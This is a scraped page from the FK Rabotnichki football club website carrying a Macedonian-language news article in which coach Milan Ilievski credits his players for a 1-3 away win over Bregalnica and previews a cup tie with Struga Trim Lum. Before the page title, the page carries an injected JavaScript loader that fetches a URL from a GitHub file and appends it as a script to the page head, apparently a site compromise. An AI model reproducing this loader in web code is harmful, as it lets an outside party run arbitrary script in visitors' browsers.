;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Илиевски: Заслугата за триумфот во Штип е на фудбалерите
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Илиевски: Заслугата за триумфот во Штип е на фудбалерите

Работнички оствари важен триумф (1-3) на гости против Брегалница во деветтото коло од Првата фудбалска лига. Тоа беше дебитантска победа за новиот шеф на стручниот штаб Милан Илиевски, кој заедно со Баже Илијоски, го презеде тимот во текот на репрезентативната пауза.

Задоволство по триумфот секако е присутно, но Илиевски вели дека сега фокусот е веднаш насочен кон куп-натпреварпот против Струга Трим Лум.

„Задоволни сме, на триумф не се гледа низ заби. Морам да кажам дека целата заслуга оди за фудбалерите, кои одиграа одлично и во целост ги исполнија сите наши планови пред натпреварот. И да имаше некоја грешка, секако анализата ќе ни послужи да бидеме уште подобри на наредните натпревари. Кога го презедов Работнички на момците им реков дека мораат да веруваат во себе. Во овој тим има двајца поранешни репрезентативци, капитенот Крсте Велкоски и Арменд Алими, еден актуелен член на националниот тим, голманот Игор Алексовски, двајца младински репрезентативци Димитар Тодоровски и Методи Максимов, и уште неколку млади сили, Манојлов, Елмас, и останатите…Имаме неколку добри странци. Едноставно, нивниот квалитет и потенцијал заслужува тимот да биде пласиран многу подобро на табелата. Ќе работиме напорно, против Брегалница беше одлично и веруваме дека ќе одиме напред“, вели Милан Илиевски.

В среда Работнички гостува во Струга во Купот на Македонија…

„Сигурно нема да одиме таму само за да го видиме езерото. Имаме свои идеи, имаме свој план, имаме и максимално мотивиран тим кој сака да одигра нов квалитетен натпревар. Струга Трум Лум има одличен состав, непоразени се од почетокот на сезоната, но Купот е секогаш интересно натпреварување, а само еден може да продолжи во следната рунда“, истакнува Илиевски.